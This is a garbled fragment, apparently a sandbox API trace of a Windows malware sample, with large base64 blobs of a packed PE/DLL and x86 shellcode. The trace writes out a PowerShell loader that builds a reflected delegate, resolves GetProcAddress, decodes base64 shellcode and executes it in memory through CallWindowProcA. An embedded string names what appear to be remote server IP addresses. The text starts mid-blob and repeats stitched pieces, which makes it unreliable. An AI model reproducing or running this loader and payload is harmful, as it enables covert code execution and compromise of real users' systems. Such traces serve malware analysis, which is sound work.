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", lpSrch="{ps_shellcode_length}") returned="{ps_shellcode_length},0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);" [0035.937] strncpy (in: _Dest=0x18dfe8, _Source=",0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);", _Count=0x1000 | out: _Dest=",0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);") returned=",0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);" [0035.937] strncpy (in: _Dest=0x3b553f, _Source="15108", _Count=0xee | out: _Dest="15108") returned="15108" [0035.937] strncat (in: _Dest="function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(\"ReflectedDelegate\")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(\"InMemoryModule\",$false).DefineType(\"MyDelegateType\",\"Class,Public,Sealed,AnsiClass,AutoClass\",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor(\"RTSpecialName,HideBySig,Public\",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags(\"Runtime,Managed\");$TypeBuilder.DefineMethod(\"Invoke\",\"Public,HideBySig,NewSlot,Virtual\",$ReturnType,$Parameters).SetImplementationFlags(\"Runtime,Managed\");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\"\\\\\")[-1].Equals(\"System.dll\")};$UnsafeNativeMethods=$SystemAssembly.GetType(\"Microsoft.Win32.UnsafeNativeMethods\");return $UnsafeNativeMethods.GetMethod(\"GetProcAddress\").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod(\"GetModuleHandle\").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String(\"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", _Source=",0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);", _Count=0x562d | out: _Dest="function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(\"ReflectedDelegate\")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(\"InMemoryModule\",$false).DefineType(\"MyDelegateType\",\"Class,Public,Sealed,AnsiClass,AutoClass\",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor(\"RTSpecialName,HideBySig,Public\",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags(\"Runtime,Managed\");$TypeBuilder.DefineMethod(\"Invoke\",\"Public,HideBySig,NewSlot,Virtual\",$ReturnType,$Parameters).SetImplementationFlags(\"Runtime,Managed\");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\"\\\\\")[-1].Equals(\"System.dll\")};$UnsafeNativeMethods=$SystemAssembly.GetType(\"Microsoft.Win32.UnsafeNativeMethods\");return $UnsafeNativeMethods.GetMethod(\"GetProcAddress\").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod(\"GetModuleHandle\").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String(\"VYvsg+xoamtYamVmiUWYWGpyZolFmlhqbmaJRZxYamVmiUWeWGpsZolFoFhqM2aJRaJYajJmiUWkWGouZolFplhqZGaJRahYamxmiUWqWGaJRaxmiUWuZKEwAAAAx0XAVmlydMdFxHVhbEHHRchsbG9jxkXMAItADFODwAxWx0XQTG9hZMdF1ExpYnLHRdhhcnlBxkXcAMdFsEdldFDHRbRyb2NBx0W4ZGRyZWbHRbxzc8ZFvgCLyFeLCWaDeSwYdSWLcTCNVZgz/yvyjRR+ilQVmDJUfZj2wkF1BkeD/wxy6oP/DHQ5O8h1zotVCItCPItEEHiDZfgAA8KLeCCLcByLWCSLQBgD8gPaA/qJdeiJXeyJReSFwA+EggAAAOsLi1EY68mLXeyLdeiLRfiLDIcPtwRDizSGg2X8AAPKiU30jUXQA/IpRfSLRfyLXfQD2IpEBdA6RB3QdQn/RfyDffwNcuWDffwNdQOJdeCJTfSNTbAzwClN9ItN9IpcBbADyDpcDbB1BkCD+A9y64P4D3UDiXXw/0X4i0X4O0XkcoWNRcBQUv9V8It1CIueQBEAAIHGBBEAAGpAaAAwAAAD3v9zUGoA/9CJRfiFwA+EFgEAAItLVINl9ACL+POkD7dLFI1UGSAzyWY7SwZzM4tKCIsyO852AovOhcl0FYt9CItyDIHHBBEAAAP3i3oEA/jzpA+3Swb/RfSDwig5TfRyzYtwPAPwi46AAAAAg3wBDAB0SY18AQyLDwPIUf9V4IlF5IXAdCuLXwQDXfjrHosDhcB5BQ+3wOsHi034jUQIAlD/deT/VfCJA4PDBIM7AHXdi0X4g8cUgz8AdbuLjqQAAACJTeCLjqAAAACL2CteNAPIg2X0AOs2i1XgOVX0czWNVvjR6nQijXkIiVXwD7cXZoXSdAyB4v8PAAAD0AMRARqDxwL/TfB15AF19APOi3EEhfZ1w4tIPItMCChqAGoB/3UIA8j/0esCM8BfXlvJwhAAU1VWM/ZXOTU4kEAAdQv/FWgwQACjOJBAAIsdDDFAAL04kEAAVf/Tag4z0ln38Yv6R3QZVf/TM9JqGVn38YtEJBSAwmGIFAZGO/dy54tEJBRfxgQGAF5dW8IEAFWL7LgAEAAA6NgJAABTVos1BDFAAFcz2/91EP91CP8VuDBAAIv4hf90SotFEI1IAYoQQITSdfkrwQPHaAAQAABQjYUA8P//UP/Wi0UIK8cDRQxQ/3UUV//W/3UMjYUA8P//UP91CP8VADFAADPbg8QkQ+ukX16Lw1vJwhAAVYvsgexMBAAAVlcz/1dXvgQBAABWjYW0+///UP91CFf/FTgxQACFwA+IqQAAAGo4jUXIV1DHRcQ8AAAA6CEJAACDxAyNhbz9//9QVv8VPDBAAP91CP8VsDBAAFCNhbz9//9Q/xW0MEAAV42FvP3//1CNhbT7//9Q/xVAMEAAhcB0VY2FvP3//4lF1I1FxFDHRchAAAAAx0XYRDNAAP8VpDBAAIXAdBhowCcJAP91/P8VRDBAAP91/P8ViDBAAEeLNYQwQ